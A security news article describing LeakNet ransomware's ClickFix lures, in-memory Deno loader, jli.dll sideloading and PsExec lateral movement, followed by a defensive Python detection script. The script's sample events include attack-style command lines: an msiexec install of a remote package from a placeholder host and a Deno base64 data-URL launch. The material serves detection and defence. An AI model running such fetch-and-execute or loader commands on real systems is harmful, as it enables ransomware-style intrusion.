LeakNet Boosts Ransomware with ClickFix Lures, Stealthy Deno Loader

GBHackers On Security
Mar 18, 2026

Why It Matters

By leveraging trusted binaries and web‑based social engineering, LeakNet evades traditional signature controls, forcing defenders to adopt behavior‑centric detection across the entire attack chain.

Key Takeaways

  • LeakNet uses ClickFix lures on compromised legitimate sites
  • Deno loader runs base64 payload entirely in memory
  • Malware sideloads jli.dll via Java to evade detection
  • PsExec used after Kerberos ticket enumeration for lateral movement
  • Defenders should monitor msiexec from browsers and Win‑R

Pulse Analysis

The ransomware landscape is witnessing a shift from broker‑mediated initial access toward self‑served, mass‑market infection vectors. LeakNet’s ClickFix lures exploit the trust users place in familiar web interfaces, such as fake Cloudflare Turnstile pages, to deliver an msiexec command that initiates the payload. This approach eliminates the need for costly credential purchases and expands the attack surface to any employee browsing the internet, dramatically increasing the odds of a successful compromise.

At the core of LeakNet’s new methodology is a Deno‑based loader that follows a bring‑your‑own‑runtime pattern. By executing a base64‑encoded JavaScript payload via a data: URL, the loader operates almost exclusively in memory, leaving negligible disk artifacts. Because Deno is a signed, widely‑used runtime, it can slip past naïve allow‑list policies; the malicious context—unusual command‑line arguments, execution outside development environments, and persistent outbound traffic—becomes the primary detection cue. This memory‑only execution model mirrors trends seen in other advanced threat groups that favor in‑memory techniques to outpace traditional antivirus solutions.

For defenders, the convergence of trusted binaries, cloud services, and compromised web assets demands a move toward behavioral analytics. Monitoring for msiexec invocations originating from browsers or Win‑R dialogs, flagging Deno processes that handle base64 data URLs, and detecting DLL sideloading in unexpected directories can surface early indicators. Coupled with strict user privileges—blocking PsExec and Win‑R for non‑administrators—and automated response playbooks, organizations can reduce the window of exposure. LeakNet’s tactics underscore the necessity of holistic, context‑aware security postures in an era where ransomware operators increasingly blend legitimate tools with custom code.
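The detection cues named in the paragraph above, sketched as an added example (not code from the article or from any vendor rule set). The event field names, the browser list, the expected Java directories, the remote-URL condition and all sample events are assumptions constructed for illustration.

```python
import re

# Assumed, hypothetical event shape (normalized Sysmon-style records):
# process: {"type", "image", "parent", "cmdline"}; image_load: {"type", "loaded"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
DATA_URL = re.compile(r"data:[\w/+.;=\-]*;base64,", re.I)
REMOTE = re.compile(r"https?://", re.I)
# Assumption: where a legitimate jli.dll lives on this fleet; tune per environment.
JAVA_DIRS = ("c:\\program files\\java\\", "c:\\program files\\eclipse adoptium\\")

def base(path):
    # Lower-cased file name of a Windows path.
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(ev):
    """Return the names of the rules that fire for one event."""
    hits = []
    if ev["type"] == "process":
        image, parent, cmd = base(ev["image"]), base(ev.get("parent", "")), ev.get("cmdline", "")
        if image == "msiexec.exe" and parent in BROWSERS:
            hits.append("msiexec_from_browser")
        # Win-R launches are children of explorer.exe, but so are double-clicked
        # MSIs; requiring a remote package URL is an assumption to cut that noise.
        elif image == "msiexec.exe" and parent == "explorer.exe" and REMOTE.search(cmd):
            hits.append("msiexec_remote_from_explorer")
        if image == "deno.exe" and DATA_URL.search(cmd):
            hits.append("deno_base64_data_url")
    elif ev["type"] == "image_load" and base(ev["loaded"]) == "jli.dll":
        if not ev["loaded"].lower().startswith(JAVA_DIRS):
            hits.append("jli_dll_unexpected_dir")
    return hits

def scan(events):
    """Return (index, rule names) for every event that matched a rule."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := detect(ev))]

# Constructed sample events; every path, user and URL is a placeholder.
SAMPLE = [
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "msiexec /i https://example.invalid/pkg.msi /qn"},
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'msiexec /i "C:\Users\a\Downloads\tool.msi"'},
    {"type": "process", "image": r"C:\Users\a\AppData\Local\Temp\deno.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "deno.exe run -A data:application/javascript;base64,Y29uc29sZS5sb2coMSk="},
    {"type": "process", "image": r"C:\dev\deno.exe", "parent": r"C:\dev\Code.exe",
     "cmdline": r"deno run C:\dev\app\main.ts"},
    {"type": "image_load", "loaded": r"C:\Users\a\AppData\Local\Temp\x\jli.dll"},
    {"type": "image_load", "loaded": r"C:\Program Files\Java\jdk-21\bin\jli.dll"},
]
```

`scan(SAMPLE)` flags the remote msiexec launch, the Deno data: URL invocation and the jli.dll load from a temp directory, and leaves the local MSI install, the developer Deno run and the JDK-directory load alone.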
